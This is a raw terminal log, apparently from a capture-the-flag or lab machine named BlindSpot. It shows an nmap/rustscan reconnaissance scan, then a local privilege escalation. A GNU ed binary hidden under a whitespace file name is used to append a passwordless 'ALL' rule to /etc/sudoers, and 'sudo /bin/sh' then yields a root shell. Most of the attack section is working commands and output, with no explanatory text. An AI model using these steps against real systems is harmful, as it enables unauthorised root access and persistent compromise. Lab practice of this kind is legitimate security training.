┌──(root㉿Eecho)-[/tmp/bbbb] └─# rustscan -a 192.168.43.143 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- With RustScan, I scan ports so fast, even my firewall gets whiplash 💨
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.143:22 Open 192.168.43.143:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.143 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-18 20:17 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed Initiating ARP Ping Scan at 20:17 Scanning 192.168.43.143 [1 port] Completed ARP Ping Scan at 20:17, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 20:17 Completed Parallel DNS resolution of 1 host. at 20:17, 1.50s elapsed DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0] Initiating SYN Stealth Scan at 20:17 Scanning 192.168.43.143 [2 ports] Discovered open port 80/tcp on 192.168.43.143 Discovered open port 22/tcp on 192.168.43.143 Completed SYN Stealth Scan at 20:17, 0.02s elapsed (2 total ports) Initiating Service scan at 20:17 Scanning 2 services on 192.168.43.143 Completed Service scan at 20:17, 6.02s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.43.143 Retrying OS detection (try #2) against 192.168.43.143 NSE: Script scanning 192.168.43.143. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.18s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed Nmap scan report for 192.168.43.143 Host is up, received arp-response (0.00060s latency). Scanned at 2026-05-18 20:17:37 CST for 10s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 10.3 (protocol 2.0) 80/tcp open http syn-ack ttl 64 Werkzeug httpd 3.1.8 (Python 3.14.3) |_http-title: Site doesn't have a title (text/html; charset=utf-8). | http-methods: |_ Supported Methods: OPTIONS GET HEAD |_http-server-header: Werkzeug/3.1.8 Python/3.14.3 MAC Address: 08:00:27:8E:CE:B2 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Linux 4.15 - 5.19 (97%), OpenWrt 22.03 (Linux 5.10) (94%), Android 9 - 11 (Linux 4.9 - 4.14) (93%), Linux 2.6.32 (93%), Linux 5.10 - 5.19 (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 2.6.32 - 3.10 (93%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.99%E=4%D=5/18%OT=22%CT=%CU=33852%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A0B036B%P=x86_64-pc-linux-gnu) SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=21) SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=22) OPS(O1=M5B4ST11NW9%O2=M5B4ST11NW9%O3=M5B4NNT11NW9%O4=M5B4ST11NW9%O5=M5B4ST11NW9%O6=M5B4ST11) WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88) ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW9%CC=Y%Q=) T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.000 days (since Mon May 18 20:17:46 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros
TRACEROUTE HOP RTT ADDRESS 1 0.60 ms 192.168.43.143
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:17 Completed NSE at 20:17, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds Raw packets sent: 47 (3.672KB) | Rcvd: 31 (2.616KB)
1nv151b13@BlindSpot:/usr/bin$ '/usr/bin/ ' --help GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands. Ed is the 'standard' text editor in the sense that it is the original editor for Unix, and thus widely available. For most purposes, however, it is superseded by full-screen editors.
Usage: /usr/bin/ [options] [[+line] file]
The file name may be preceded by '+line', '+/RE', or '+?RE' to set the current line to the line number specified or to the first or last line matching the regular expression 'RE'.
Start edit by reading in 'file' if given. If 'file' begins with a '!', read output of shell command.
The environment variable LINES can be used to set the initial window size.
Options: -h, --help display this help and exit -V, --version output version information and exit -E, --extended-regexp use extended regular expressions -G, --traditional run in compatibility mode -l, --loose-exit-status exit with 0 status even if a command fails -p, --prompt=STRING use STRING as an interactive prompt -q, --quiet, --silent suppress diagnostics written to stderr -r, --restricted run in restricted mode -s, --script suppress byte counts and '!' prompt -v, --verbose be verbose; equivalent to the 'H' command --strip-trailing-cr strip carriage returns at end of text lines --unsafe-names allow control characters in file names
*Exit status* 0 for a normal exit, 1 for environmental problems (invalid command-line options, memory exhausted, command failed, etc), 2 for problems with the input file (file not found, buffer modified, I/O errors), 3 for an internal consistency error (e.g., bug) which caused ed to panic.
Report bugs to bug-ed@gnu.org Ed home page: http://www.gnu.org/software/ed/ed.html General help using GNU software: http://www.gnu.org/gethelp
1nv151b13@BlindSpot:/usr/bin$ /"usr/bin/ " /etc/sudoers 5053 $ @includedir /etc/sudoers.d a 1nv151b13 ALL=(ALL:ALL) NOPASSWD: ALL . w 5094 q 1nv151b13@BlindSpot:/usr/bin$ sudo -l Matching Defaults entries for 1nv151b13 on BlindSpot: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for 1nv151b13: Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User 1nv151b13 may run the following commands on BlindSpot: (ALL : ALL) NOPASSWD: ALL 1nv151b13@BlindSpot:/usr/bin$ sudo /bin/sh root@BlindSpot:/usr/bin# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) root@BlindSpot:/usr/bin#